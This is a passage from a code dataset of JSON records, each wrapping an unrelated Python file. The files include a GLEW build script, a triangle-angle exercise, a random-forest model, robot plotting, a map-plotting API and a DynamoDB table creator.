walk\nfrom .common import *\n\n__version__ = '0.1.4'\n\nglew_ver = '1.12.0'\n\n\ndef get_glew(cache, build_path, arch, pyver, package, output):\n url = ('http://iweb.dl.sourceforge.net/project/glew/glew/{0}/glew-{0}.zip'.\n format(glew_ver))\n local_url = download_cache(cache, url, build_path)\n\n print('Extracting glew {}'.format(local_url))\n with open(local_url, 'rb') as fd:\n ZipFile(fd).extractall(join(build_path, package))\n\n z = base_dir = join(build_path, package, list(listdir(join(build_path, package)))[0])\n exec_binary(\n 'Compiling Glew',\n ['gcc', '-DGLEW_NO_GLU', '-O2', '-Wall', '-W', '-Iinclude', '-DGLEW_BUILD',\n '-o', 'src/glew.o', '-c', 'src/glew.c'], cwd=base_dir, shell=True)\n exec_binary(\n '',\n ['gcc', '-shared', '-Wl,-soname,libglew32.dll',\n '-Wl,--out-implib,lib/libglew32.dll.a', '-o', 'lib/glew32.dll',\n 'src/glew.o', '-lglu32', '-lopengl32', '-lgdi32',\n '-luser32', '-lkernel32'], cwd=base_dir, shell=True)\n exec_binary(\n '', ['ar', 'cr', 'lib/libglew32.a', 'src/glew.o'], cwd=base_dir, shell=True)\n\n data = []\n for fname in glob(join(z, 'include', 'GL', '*')):\n data.append((\n fname, fname.replace(z, '').strip(sep), join('include', 'GL'), True))\n\n data.append((\n join(z, 'lib', 'libglew32.a'), join('lib', 'libglew32.a'), 'libs', True))\n data.append((\n join(z, 'lib', 'libglew32.dll.a'), join('lib', 'libglew32.dll.a'), 'libs', True))\n\n data.append((\n join(z, 'lib', 'glew32.dll'), join('bin', 'glew32.dll'),\n join('share', package, 'bin'), False))\n\n make_package(join(build_path, 'project'), package, data, __version__, output, 'MIT')\n\n\nif __name__ == '__main__':\n parse_args(get_glew)\n","sub_path":"win/glew.py","file_name":"glew.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"544494691","text":"\n\nfrom xai.brain.wordbase.nouns._hallmark import _HALLMARK\n\n#calss header\nclass _HALLMARKS(_HALLMARK, ):\n\tdef __init__(self,): \n\t\t_HALLMARK.__init__(self)\n\t\tself.name = \"HALLMARKS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"hallmark\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_hallmarks.py","file_name":"_hallmarks.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"505321585","text":"import math\n\ndef angles(a, b, c):\n # /\\\n # a/ \\ b\n # /____\\\n # c\n for_alpha_up = b**2 + c**2 - a**2\n print(for_alpha_up)\n for_alpha_down = 2*b*c\n print(for_alpha_down)\n for_beta_up = a**2 + c**2 - b**2\n print(for_beta_up)\n for_beta_down = 2*a*c\n print(for_beta_down)\n\n try:\n alpha = round(float(math.degrees(math.acos(for_alpha_up / for_alpha_down))))\n beta = round(float(math.degrees(math.acos(for_beta_up / for_beta_down))))\n gamma = 180 - alpha - beta\n if gamma == 180:\n gamma = 0\n except ValueError:\n alpha = 0\n beta = 0\n gamma = 0\n angle = []\n angle.append(alpha)\n angle.append(beta)\n angle.append(gamma)\n print(angle)\n angle.sort()\n return angle\n\n\n\n\n #return [0, 0, 0]\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert angles(4, 4, 4) == [60, 60, 60], \"All sides are equal\"\n assert angles(3, 4, 5) == [37, 53, 90], \"Egyptian triangle\"\n assert angles(2, 2, 5) == [0, 0, 0], \"It can not be a triangle\"\n assert angles(10, 20, 30) == [60, 60, 60], \"All sides are equal\"\n\n print(\"Code's finished? Earn rewards by clicking 'Check' to review your tests!\")\n","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"80257380","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport sys\nimport os\n\nexclude = (\"id\", \"test\", \"train\", \"status_group\", \"num_private\", \"scheme_name\",\n 'waterpoint_type_group',\n 'quality_group',\n 'payment_type',\n 'extraction_type_group',\n 'extraction_type_class',\n 'management_group',\n 'source_type',\n 'source_class')\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ntrainx_path = os.path.join(os.getenv(\"ML_FINAL_DATA_PATH\"), \"PJ3\", \"training_values_processed.csv\")\ntestx_path = os.path.join(os.getenv(\"ML_FINAL_DATA_PATH\"), \"PJ3\", \"testing_values_processed.csv\")\n\ntrain_values = pd.read_csv(trainx_path)\ntest_values = pd.read_csv(testx_path)\n\n######################\n# Select features\n##################################################################\n\nprint(\"Select features\")\n# Select all features except which start with a string in exclude\nfeatures = [col for col in list(train_values) if not col.startswith(exclude)]\n\n######################\n# Train model\n##################################################################\n\nprint(\"Train model\")\n# Build a forest of trees from the training set\nclf = RandomForestClassifier(n_estimators=500, \n min_samples_leaf=2, \n max_features=0.20, \n oob_score=True, \n n_jobs=-1,\n random_state=242).fit(train_values[features],\n train_values[\"status_group\"])\n\n######################\n# Evaluate model\n##################################################################\n\nprint(\"Evaluate model\")\nprint(\"OOB Error Score: \" + str(round(1 - clf.oob_score_, 4)))\n\nfrom sklearn.model_selection import cross_val_score\n\n# Make prediction\npredicted = clf.predict(train_values[features])\n\n# Confusion matrix\npd.crosstab(train_values.status_group, predicted, rownames=['Actual'], colnames=['Predicted'])\n\n# Sorted feature importance\n# fi = sorted(list(zip(train_values[features], clf.feature_importances_)), key=lambda x: str(x[1]), reverse=True)\n# print(fi)\n\n# Evaluate a score by cross-validation\n#scores = cross_val_score(clf, train_values[features], train_values[\"status_group\"], cv=10)\n#print(\"Accuracy: %0.4f (+/- %0.4f)\" % (scores.mean(), scores.std() * 2))\n\n######################\n# Prediction for competition\n##################################################################\n\nprediction = clf.predict(test_values[features])\nprediction_df = pd.DataFrame(prediction, columns=[\"status_group\"])\nsubmission = pd.merge(test_values.id.reset_index()[\"id\"].to_frame(), prediction_df, right_index = True, left_index = True)\nprint(submission.head())\nsubmission.to_csv(\"sub.csv\", index = False)\n","sub_path":"src/PJ3/villrf.py","file_name":"villrf.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268379117","text":"#!/usr/bin/python3\n# -*- encoding: utf-8 -*-\n\nimport sys\nimport os\nimport re\n\nif (len(sys.argv) < 2):\n print(\"Usage: {0} {1}\".format(\n sys.argv[0],\n 'extract clk from fpga dump '))\n quit()\n\n\ndef ex_clk(fname):\n with open(fname, 'r') as f:\n for line in f:\n r = re.match(r'\\d+\\(\\d+\\), type.*\\s(\\d+)\\(\\d+ns\\)', line)\n if (r):\n print(r.group(1))\n\n\ndef main():\n fname = sys.argv[1]\n ex_clk(fname)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ex_clk.py","file_name":"ex_clk.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"147008378","text":"__author__ = 'Monique Tucker'\n\nimport unittest\nfrom test_pairstest import look_for_pairs\n\nclass MyTestCase(unittest.TestCase):\n def test_successful_pairs_match(self):\n self.assertTrue(look_for_pairs([2, 5]))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python_projects/test_pairstest2.py","file_name":"test_pairstest2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"334003916","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n#-----\n\nfrom scipy.interpolate import CubicSpline\n\n\ndef create_spline(qd):\n step = 0.1\n\n qd_set = [[],[],[],[],[]]\n data_space = [[],[],[],[],[]]\n\n\n #Transform data\n qd = qd.transpose()\n\n i = 0\n for qdi in qd:\n x = np.arange(0,qdi.shape[1])\n y = np.squeeze(np.asarray(qdi))\n\n cs = CubicSpline(x,y)\n\n data_space[i] = np.arange(0,qdi.shape[1]-1,step)\n\n qd_set[i]=cs(data_space[i])\n\n i = i + 1\n\n\n #plt.plot(data_space[1],qd_set[1])\n #plt.show()\n return qd_set\n\ndef readDataFromfile(filename):\n\n datafile = open(filename,'r')\n #Load every line except the last one since it may be incomplete, because\n # ctrl-c is used and cutting in the middle of writing to file is possible.\n datas = np.genfromtxt(datafile,skip_footer=1)\n\n data_from_robot = {'qd':[],'q':[],'q_tilde':[],'u':[],'g':[],'t':[]}\n\n for i in range(0,datas.shape[0]-5,6):\n data_from_robot['qd'].append(datas[i])\n data_from_robot['q'].append(datas[i+1])\n data_from_robot['q_tilde'].append(datas[i+2])\n data_from_robot['u'].append(datas[i+3])\n data_from_robot['g'].append(datas[i+4])\n data_from_robot['t'].append(datas[i+5])\n\n\n datafile.close()\n return data_from_robot\n\ndef plotJointAngles(dtf,radians,degrees,autos):\n\n t = [item[0] for item in dtf['t']]\n\n q1 = [item[0] for item in dtf['q']]\n q2 = [item[1] for item in dtf['q']]\n q3 = [item[2] for item in dtf['q']]\n q4 = [item[3] for item in dtf['q']]\n q5 = [item[4] for item in dtf['q']]\n\n qd1 = [item[0] for item in dtf['qd']]\n qd2 = [item[1] for item in dtf['qd']]\n qd3 = [item[2] for item in dtf['qd']]\n qd4 = [item[3] for item in dtf['qd']]\n qd5 = [item[4] for item in dtf['qd']]\n\n\n\n if radians:\n plt.figure(1)\n\n plt.subplot(511)\n plt.plot(t,q1,'r',t,qd1)\n plt.title('Measured joint angles and desired joint angles')\n plt.xlabel('time(seconds)')\n plt.ylabel('q_1 (rad)')\n plt.ylim(ylimitLO,ylimitUP)\n plt.autoscale(autos)\n\n plt.subplot(512)\n plt.plot(t,q2,'r',t,qd2)\n plt.xlabel('time(seconds)')\n plt.ylabel('q_2 (rad)')\n plt.ylim(ylimitLO,ylimitUP)\n plt.autoscale(autos)\n\n plt.subplot(513)\n plt.plot(t,q3,'r',t,qd3)\n plt.xlabel('time(seconds)')\n plt.ylabel('q_3 (rad)')\n plt.ylim(ylimitLO,ylimitUP)\n plt.autoscale(autos)\n\n plt.subplot(514)\n plt.plot(t,q4,'r',t,qd4)\n plt.xlabel('time(seconds)')\n plt.ylabel('q_4 (rad)')\n plt.ylim(ylimitLO,ylimitUP)\n plt.autoscale(autos)\n\n plt.subplot(515)\n plt.plot(t,q5,'r',t,qd5)\n plt.xlabel('time(seconds)')\n plt.ylabel('q_5 (rad)')\n plt.ylim(ylimitLO,ylimitUP)\n plt.autoscale(autos)\n\n plt.show()\n\n if degrees:\n plt.figure(2)\n\n plt.subplot(511)\n plt.plot(t,np.degrees(q1),'r',t,np.degrees(qd1))\n plt.title('Measured joint angles and desired joint angles')\n plt.xlabel('time(seconds)')\n plt.ylabel('q_1 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.subplot(512)\n plt.plot(t,np.degrees(q2),'r',t,np.degrees(qd2))\n plt.xlabel('time(seconds)')\n plt.ylabel('q_2 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.subplot(513)\n plt.plot(t,np.degrees(q3),'r',t,np.degrees(qd3))\n plt.xlabel('time(seconds)')\n plt.ylabel('q_3 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.subplot(514)\n plt.plot(t,np.degrees(q4),'r',t,np.degrees(qd4))\n plt.xlabel('time(seconds)')\n plt.ylabel('q_4 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.subplot(515)\n plt.plot(t,np.degrees(q5),'r',t,np.degrees(qd5))\n plt.xlabel('time(seconds)')\n plt.ylabel('q_5 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.show()\n\n\nif __name__ == '__main__':\n filename = '/home/magnaars/catkin_ws/src/five_dof_robotarm/src/datafile.txt'\n\n dtf = readDataFromfile(filename)\n\n #Upper and lower limits of y-axis\n ylimitHI = float('nan')\n ylimitLO = float('nan')\n\n #Choose to plot in rad or deg\n radians = False\n degrees = True\n\n #autoscale\n autos = True\n\n plotJointAngles(dtf,radians,degrees,autos)\n","sub_path":"src/plot_robot_data.py","file_name":"plot_robot_data.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"636257349","text":"import asyncio\nimport random\nimport time\nimport sys\n\nBOOTS = 0\nstart_time = 0\n\nasync def make_boot():\n global BOOTS\n manufacturing_time = random.choice([1,3,5])\n await asyncio.sleep(manufacturing_time)\n BOOTS += 1\n\nasync def print_data():\n while 1:\n global start_time\n await asyncio.sleep(1)\n current_time=loop.time()\n print(\"seconds: {} boots: {}\".format(current_time-start_time,BOOTS))\n\nasync def worker():\n while 1:\n await make_boot()\n\nasync def main():\n await asyncio.gather(worker(), print_data())\n\ndef build_tasks(workers):\n tasks = [\n asyncio.ensure_future(print_data())]\n for _ in range(workers):\n tasks.append(asyncio.ensure_future(worker()))\n\n return tasks\n\nif __name__ == \"__main__\":\n workers = int(sys.argv[1])\n loop = asyncio.get_event_loop()\n start_time=loop.time()\n tasks = build_tasks(workers)\n loop.run_until_complete(asyncio.wait(tasks))\n loop.close()\n","sub_path":"python_async_intro/boot_factory_3.py","file_name":"boot_factory_3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623092718","text":"from opengever.api.ogdslistingbase import OGDSListingBaseService\nfrom opengever.api.solr_query_service import DEFAULT_SORT_INDEX\nfrom opengever.base.helpers import display_name\nfrom opengever.globalindex.model.task import AVOID_DUPLICATES_STRATEGY_LOCAL\nfrom opengever.globalindex.model.task import Task\nfrom opengever.ogds.models.group import Group\nfrom opengever.ogds.models.group import groups_users\nfrom opengever.ogds.models.team import Team\nfrom opengever.task.helper import task_type_value_helper\nfrom plone.restapi.interfaces import ISerializeToJson\nfrom sqlalchemy import Date\nfrom zope.globalrequest import getRequest\nfrom zope.i18n import translate\n\n\ndef translate_review_state(review_state):\n return translate(review_state, domain='plone', context=getRequest())\n\n\nclass GlobalIndexGet(OGDSListingBaseService):\n\n model_class = Task\n\n searchable_columns = [Task.title, Task.text,\n Task.sequence_number, Task.responsible]\n facet_columns = (\n Task.issuer,\n Task.responsible,\n Task.review_state,\n Task.task_type,\n )\n facet_label_transforms = {\n 'issuer': display_name,\n 'responsible': display_name,\n 'review_state': translate_review_state,\n 'task_type': task_type_value_helper,\n }\n\n default_sort_on = DEFAULT_SORT_INDEX\n default_sort_order = 'descending'\n serializer_interface = ISerializeToJson\n unique_sort_on = 'id'\n\n def extend_query_with_filters(self, query, filters):\n for key, value in filters.items():\n if not isinstance(value, list):\n value = [value]\n\n if key.startswith('-'):\n key = key[1:]\n exclude = True\n else:\n exclude = False\n\n column = getattr(Task, key, None)\n if column is None:\n continue\n\n # If filtering by responsible, also include all teams the user\n # belongs to.\n if column is Task.responsible and len(value) == 1:\n value.extend([\n team.actor_id() for team in\n Team.query.join(Group).join(groups_users)\n .filter_by(userid=value[0])\n ])\n\n if isinstance(column.type, Date):\n lower, upper = value[0].split(' TO ')\n if lower == '*':\n query = query.filter(column <= upper)\n elif upper == '*':\n query = query.filter(column >= lower)\n else:\n query = query.filter(column.between(lower, upper))\n elif exclude:\n query = query.filter(column.notin_(value))\n else:\n query = query.filter(column.in_(value))\n return query\n\n def get_base_query(self):\n strategy = self.request.form.get('duplicate_strategy',\n AVOID_DUPLICATES_STRATEGY_LOCAL)\n return Task.query.restrict().avoid_duplicates(strategy=strategy)\n","sub_path":"opengever/api/globalindex.py","file_name":"globalindex.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"615619643","text":"#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n\n### Import functions\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport os\nimport torch\nimport torch.nn as nn\nfrom matplotlib import cm\n\nsys.path.append('')\n\nimport fct_facilities as fac\nimport fct_network as net\nimport fct_integrals as integ\n\n\nfac.SetPlotParams()\n\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n### Set parameters\n\nP = 20\nN = 200\neta = 0.4\n\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n### Theory \n\ngain_values_th = np.linspace( 1, 1.75*4, 80 )\noffset_values_th = np.linspace( 0, 2, 80 )\n\nK_bar_th = np.zeros(( 2, 2, len(gain_values_th), len(gain_values_th) )) # First axis indicates t = 0 or t = T\nY_bar_th = np.zeros(( 2, 2, len(gain_values_th), len(gain_values_th) ))\n\nK_corr_th = np.zeros(( 2, len(gain_values_th), len(offset_values_th) ))\nY_corr_th = np.zeros(( 2, len(gain_values_th), len(offset_values_th) ))\n\n#\n\nih = net.ih\nil = net.il\n\ndoCompute = 1\n\nif doCompute:\n\n\tfor i, gain in enumerate(gain_values_th):\n\n\t\tfor j, offset in enumerate(offset_values_th):\n\n\t\t\t#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n\t\t\t### t = 0 \n\n\t\t\t# Almost everyinteging remains 0\n\n\t\t\t#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n\t\t\t### t = T \n\n\t\t\t# Compute coordinates\n\n\t\t\talpha = integ.PsiPrimeSq(gain, offset) + eta * (integ.PsiSq(gain, offset) - integ.Psi(gain, offset)**2)\n\t\t\tbeta = eta * P/2. * integ.Psi(gain, offset)**2 \n\n\t\t\tch = ( ih + beta/alpha*(ih - il) ) / (alpha + 2*beta) \n\t\t\tcl = ( il - beta/alpha*(ih - il) ) / (alpha + 2*beta)\n\n\t\t\t# Projections on axes\n\n\t\t\tK_bar_th[1,0,i,j] = ch * integ.PsiPrime()\n\t\t\tK_bar_th[1,1,i,j] = cl * integ.PsiPrime()\n\n\t\t\tY_bar_th[1,0,i,j] = ch * integ.PsiPrimeSq()\n\t\t\tY_bar_th[1,1,i,j] = cl * integ.PsiPrimeSq()\n\n\t\t\t# Compute dot products\n\n\t\t\tKnormA = N + integ.PsiPrimeSq(gain, offset) * ch**2\n\t\t\tKnormB = N + integ.PsiPrimeSq(gain, offset) * cl**2 \n\t\t\tKAA = integ.PsiPrime(gain, offset)**2 * ch**2 \n\t\t\tKBB = integ.PsiPrime(gain, offset)**2 * cl**2 \n\t\t\tKAB = integ.PsiPrime(gain, offset)**2 * ( ch * cl )\n\n\t\t\tYnormA = N * ( integ.PsiSq(gain, offset) - integ.Psi(gain, offset)**2 ) + integ.PsiPrimeFourth(gain, offset) * ch**2 \n\t\t\tYnormB = N * ( integ.PsiSq(gain, offset) - integ.Psi(gain, offset)**2 ) + integ.PsiPrimeFourth(gain, offset) * cl**2 \n\t\t\tYAA = integ.PsiPrimeSq(gain, offset)**2 * ch**2\n\t\t\tYBB = integ.PsiPrimeSq(gain, offset)**2 * cl**2 \n\t\t\tYAB = integ.PsiPrimeSq(gain, offset)**2 * ( ch * cl )\n\t\t\t\n\t\t\t# Activity measures\n\n\t\t\tK_corr_th[1,i,j] = KAB / ( np.sqrt(KnormA) * np.sqrt(KnormB) )\n\t\t\tY_corr_th[1,i,j] = YAB / ( np.sqrt(YnormA) * np.sqrt(YnormB) )\n\n\n\t# Store \n\n\tfac.Store(gain_values_th, 'gain_values_th.p', 'Results/')\n\tfac.Store(offset_values_th, 'offset_values_th.p', 'Results/')\n\n\tfac.Store(K_bar_th, 'K_bar_th.p', 'Results/')\n\tfac.Store(Y_bar_th, 'Y_bar_th.p', 'Results/')\n\n\tfac.Store(K_corr_th, 'K_corr_th.p', 'Results/')\n\tfac.Store(Y_corr_th, 'Y_corr_th.p', 'Results/')\n\nelse:\n\n\t# Retrieve\n\n\tgain_values_th = fac.Retrieve('gain_values_th.p', 'Results/')\n\toffset_values_th = fac.Retrieve('offset_values_th.p', 'Results/')\n\n\tK_bar_th = fac.Retrieve('K_bar_th.p', 'Results/')\n\tY_bar_th = fac.Retrieve('Y_bar_th.p', 'Results/')\n\n\tK_corr_th = fac.Retrieve('K_corr_th.p', 'Results/')\n\tY_corr_th = fac.Retrieve('Y_corr_th.p', 'Results/')\n\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n### Plot \n\nfac.SetPlotDim(2.1, 1.8)\ndashes = [3,3]\n\n#\n\ncmap_base = 'bwr'\nvmin, vmax = 0.2, 0.8\ncmap = fac.TruncateCmap(cmap_base, vmin, vmax)\n\n#\n\nfg = plt.figure()\nax0 = plt.axes(frameon=True)\n\ncax = plt.imshow(Y_corr_th[1,:,:].T, aspect = 'auto', vmin=-0.1, vmax=0.1, \\\n\textent = (min(gain_values_th)/4., max(gain_values_th)/4., min(offset_values_th), max(offset_values_th)), origin='lower', interpolation='nearest', cmap = cmap)\n\ncbar = fg.colorbar(cax, ticks=[-0.1, 0, 0.1], orientation='vertical')\ncbar.ax.set_xticklabels(['-0.1', '0', '0.1'])\n\nplt.xlabel(r'Gain')\nplt.ylabel(r'Threshold')\n\nplt.grid('off')\n\nplt.xticks([0.25, 1, 1.75])\nplt.yticks([0, 1, 2])\n\n# plt.colorbar()\n\nax0.spines['top'].set_visible(False)\nax0.spines['right'].set_visible(False)\nax0.yaxis.set_ticks_position('left')\nax0.xaxis.set_ticks_position('bottom')\n# plt.locator_params(nbins=4)\n\nplt.savefig('Y_corr.pdf')\nplt.show()\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n\nsys.exit(0)\n","sub_path":"SimpleCategorization/Correlations/Psi/compute_theory.py","file_name":"compute_theory.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"272036380","text":"\"\"\"\nMap plotter interface.\n\"\"\"\n\nfrom IPython.display import HTML, display\n\nfrom .display import map_to_html, standalone_html\n\n__all__ = ['Map', 'GeoPoint']\n\n\nclass GeoPoint(object):\n def __init__(self, lat, lon, weight=None):\n self.lat = lat\n self.lon = lon\n self.weight = weight\n\n @staticmethod\n def parse(obj):\n if isinstance(obj, GeoPoint):\n return obj # FIXME: why doesnt work?\n\n elif (isinstance(obj, list) or isinstance(obj, tuple)) and len(obj) in [2, 3]:\n return GeoPoint(*obj)\n\n elif isinstance(obj, str):\n parts = obj.strip().split(',')\n return GeoPoint(*map(float, parts))\n\n else:\n raise ValueError('Cannot convert \"%s\" to GeoPoint' % repr(obj))\n\n def to_coord(self):\n return self.lat, self.lon\n\n\ndef _coordinates(point):\n geo_point = GeoPoint.parse(point)\n if geo_point.weight:\n return {\n \"type\": 'Feature',\n \"geometry\": {\n \"type\": 'Point',\n \"coordinates\": geo_point.to_coord()\n },\n \"properties\": {\n \"weight\": geo_point.weight\n }\n }\n else:\n return geo_point.to_coord()\n\n\ndef _coordinates_many(points):\n coordinates = [_coordinates(point) for point in points]\n if len(coordinates) > 0 and isinstance(coordinates[0], dict):\n return {\n \"type\": 'FeatureCollection',\n \"features\": coordinates\n }\n\n return coordinates\n\n\nclass Map(object):\n \"\"\"\n Canvas for visualizing data on the interactive map.\n \"\"\"\n\n def __init__(self, show_click_coords=False):\n self.show_click_coords = show_click_coords\n self.center = [55.76, 37.64]\n self.zoom = 8\n self.objects = []\n\n def set_state(self, center, zoom):\n self.center = center\n self.zoom = zoom\n\n def add_object(self, obj):\n self.objects.append(obj)\n\n def add_placemark(self, point, hint=None, content=None, preset='islands#icon', icon_color=None):\n obj = {\n 'type': 'Placemark',\n 'point': _coordinates(point),\n 'hint': hint,\n 'content': content\n }\n\n if icon_color:\n obj['iconColor'] = icon_color\n\n if preset:\n obj['preset'] = preset\n\n self.add_object(obj)\n\n def add_line(self, points, hint=None, content=None, color='#000000', width=4, opacity=0.5):\n self.add_object({\n 'type': 'Line',\n 'points': _coordinates_many(points),\n 'hint': hint,\n 'content': content,\n 'color': color,\n 'width': width,\n 'opacity': opacity,\n })\n\n def add_heatmap(\n self,\n points,\n intensity_of_midpoint=0.2,\n radius=10,\n dissipating=False,\n gradient={\n 0.1: 'rgba(128, 255, 0, 0.7)',\n 0.2: 'rgba(255, 255, 0, 0.8)',\n 0.7: 'rgba(234, 72, 58, 0.9)',\n 1.0: 'rgba(162, 36, 25, 1)'\n }\n ):\n self.add_object({\n 'type': 'Heatmap',\n 'points': _coordinates_many(points),\n \"intensityOfMidpoint\": intensity_of_midpoint,\n \"radius\": radius,\n \"dissipating\": dissipating,\n \"gradient\": gradient\n })\n\n def add_circle(\n self,\n center,\n radius,\n hint=None,\n content=None,\n fill=True,\n color='#000000',\n opacity=0.5,\n width=1.0,\n fill_color=None,\n fill_opacity=None,\n stroke_color=None,\n stroke_opacity=None\n ):\n if fill_color is None:\n fill_color = color\n if fill_opacity is None:\n fill_opacity = opacity\n if stroke_color is None:\n stroke_color = color\n if stroke_opacity is None:\n stroke_opacity = opacity\n\n self.add_object({\n 'type': 'Circle',\n 'center': _coordinates(center),\n 'radius': radius,\n 'hint': hint,\n 'content': content,\n 'fill': fill,\n 'fillColor': fill_color,\n 'fillOpacity': fill_opacity,\n 'strokeColor': stroke_color,\n 'strokeOpacity': stroke_opacity\n })\n\n def add_polygon(\n self,\n points_outer,\n points_inner=None,\n hint=None,\n content=None,\n fill=True,\n color='#000000',\n opacity=0.5,\n width=1.0,\n fill_color=None,\n fill_opacity=None,\n stroke_color=None,\n stroke_opacity=None\n ):\n if fill_color is None:\n fill_color = color\n if fill_opacity is None:\n fill_opacity = opacity\n if stroke_color is None:\n stroke_color = color\n if stroke_opacity is None:\n stroke_opacity = opacity\n\n obj = {\n 'type': 'Polygon',\n 'pointsOuter': _coordinates_many(points_outer),\n 'hint': hint,\n 'content': content,\n 'fill': fill,\n 'fillColor': fill_color,\n 'fillOpacity': fill_opacity,\n 'strokeColor': stroke_color,\n 'strokeOpacity': stroke_opacity\n }\n\n if points_inner is not None:\n obj['pointsInner'] = _coordinates_many(points_inner)\n\n self.add_object(obj)\n\n def to_dict(self):\n \"\"\"\n Outputs JSON-serializable dictionary representation of the map plot.\n \"\"\"\n return {\n 'state': {\n 'center': self.center,\n 'zoom': self.zoom,\n },\n 'objects': self.objects,\n 'showClickCoords': self.show_click_coords\n }\n\n def to_html(self, *args, **kwargs):\n return map_to_html(self, *args, **kwargs)\n\n def display(self, *args, **kwargs):\n display(HTML(self.to_html(*args, **kwargs)))\n\n def save_html(self, file, *args, **kwargs):\n if isinstance(file, str):\n with open(file, 'w') as f:\n self.save_html(f, *args, **kwargs)\n else:\n file.write(standalone_html(self.to_html(*args, **kwargs)))\n","sub_path":"pygeoplot/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"443936096","text":"#Script para criar uma tabela no DynamoDB\n\nfrom __future__ import print_function\n\nimport os.path\nimport json\nimport sys\nimport botocore.session\nimport boto3\n\nimport modules.utils as utils\n\ndef createTable():\n print('> Iniciando operação create_table')\n filename = sys.argv[2] if len(sys.argv) > 2 else 'database\\\\table.json' \n if os.path.isfile(filename):\n print('> Lendo arquivo json')\n with open(filename) as file:\n obj = file.read()\n data = json.loads(obj)\n file.close()\n else:\n print('> Arquivo não encontrado')\n\n print('> Criando tabela')\n session = botocore.session.get_session()\n dynamodb = session.create_client('dynamodb', region_name=utils.getRegion(sys.argv[1]))\n table = dynamodb.create_table(**data)\n waiter = dynamodb.get_waiter('table_exists')\n waiter.wait(TableName=data['TableName'])\n print('> Operação finalizada')\n\nif __name__ == \"__main__\":\n if utils.areYouSure(sys.argv[1]):\n utils.summary()\n createTable()","sub_path":"create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"640648432","text":"import cgi\nimport cgitb\nimport urllib\n\nfrom google.appengine.ext import ndb\nfrom webapp2_extras.appengine.users import login_required, admin_required\nfrom google.appengine.api import users\nimport webapp2\nfrom import_export import ImportHandler, ExportHandler\n\nimport json\nfrom models import Student\nfrom tmpl import BaseHandler\n\n# Data structure: Student Data\nclass studentData(ndb.Model):\n\tname = ndb.StringProperty(indexed=True)\n\tnumLaps = ndb.IntegerProperty()\n\tteacherName = ndb.StringProperty(indexed=False)\n\tteacherName_lower = ndb.ComputedProperty(lambda self: self.teacherName.lower())\n\tbarcodeID = ndb.IntegerProperty()\n\nclass MainPage(BaseHandler):\n\t@admin_required\n\tdef get(self):\n\t\tself.render('html/index.html', {})\n\t\t\nclass LapTrackerHandler(BaseHandler):\n\t@admin_required\n\tdef get(self):\n\t\tself.render('html/tracker.html', {})\n\nclass TeacherNameHandler(webapp2.RequestHandler):\n\t@admin_required\n\tdef get(self):\n\t\tself.response.out.write(json.dumps(['Radle', 'Kumar']))\n\nclass StudentNameHandler(webapp2.RequestHandler):\n\t@admin_required\n\tdef get(self):\n\t\tstudents = 